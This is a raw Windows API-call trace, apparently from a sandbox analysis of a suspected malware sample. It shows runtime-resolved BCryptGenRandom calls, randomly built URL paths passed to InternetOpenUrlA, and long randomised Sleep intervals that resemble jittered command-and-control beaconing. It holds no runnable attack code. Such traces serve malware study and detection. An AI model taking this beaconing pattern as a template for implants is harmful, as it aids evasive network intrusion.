BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.010] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.011] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.011] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.012] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.012] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b265, cbBuffer=0x13, dwFlags=0x2 | out: pbBuffer=0x3a1b265) returned 0x0 [0245.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.013] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.013] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.014] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.015] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.015] GetProcessHeap () returned 0x440000 [0245.015] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4726f0 [0245.015] lstrcpyA (in: lpString1=0x4726f0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0245.015] lstrcatA (in: lpString1="\x04", lpString2="/aeAk0SgvgYiiql4pn0b/S5eq9RbEEf3moxsywd/" | out: lpString1="\x04/aeAk0SgvgYiiql4pn0b/S5eq9RbEEf3moxsywd/") returned="\x04/aeAk0SgvgYiiql4pn0b/S5eq9RbEEf3moxsywd/" [0245.015] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0245.015] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/aeAk0SgvgYiiql4pn0b/S5eq9RbEEf3moxsywd/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0245.015] GetProcessHeap () returned 0x440000 [0245.015] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4726f0 | out: hHeap=0x440000) returned 1 [0245.015] GetProcessHeap () returned 0x440000 [0245.015] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a1b250 | out: hHeap=0x440000) returned 1 [0245.015] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0245.016] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0245.016] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0245.016] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0245.016] Sleep (dwMilliseconds=0x11685) [0245.164] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.164] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0245.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.165] GetProcessHeap () returned 0x440000 [0245.165] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x33) returned 0x4f54b0 [0245.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.165] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.165] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4f54b1, cbBuffer=0x1c, dwFlags=0x2 | out: pbBuffer=0x4f54b1) returned 0x0 [0245.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.166] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.166] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.167] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.167] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.168] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.168] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.169] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.169] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.170] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.170] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.170] GetProcessHeap () returned 0x440000 [0245.170] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x473560 [0245.170] lstrcpyA (in: lpString1=0x473560, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0245.170] lstrcatA (in: lpString1="\x04", lpString2="/2434niImf1BXmrh7rt5aauPupg2/" | out: lpString1="\x04/2434niImf1BXmrh7rt5aauPupg2/") returned="\x04/2434niImf1BXmrh7rt5aauPupg2/" [0245.170] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0245.170] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/2434niImf1BXmrh7rt5aauPupg2/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0245.170] GetProcessHeap () returned 0x440000 [0245.171] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x473560 | out: hHeap=0x440000) returned 1 [0245.171] GetProcessHeap () returned 0x440000 [0245.171] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f54b0 | out: hHeap=0x440000) returned 1 [0245.171] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0245.171] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0245.171] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0245.172] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0245.172] Sleep (dwMilliseconds=0x1c456) [0245.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0245.458] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.458] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.458] GetProcessHeap () returned 0x440000 [0245.458] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02750 [0245.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02751, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a02751) returned 0x0 [0245.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.459] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.459] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.460] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.460] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.461] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.461] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.462] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.462] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0245.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.463] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.463] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.464] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.464] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0245.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.465] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a0276c, cbBuffer=0x24, dwFlags=0x2 | out: pbBuffer=0x3a0276c) returned 0x0 [0245.465] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.616] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.616] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.618] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.618] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0245.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.619] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.619] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0245.620] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0245.620] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 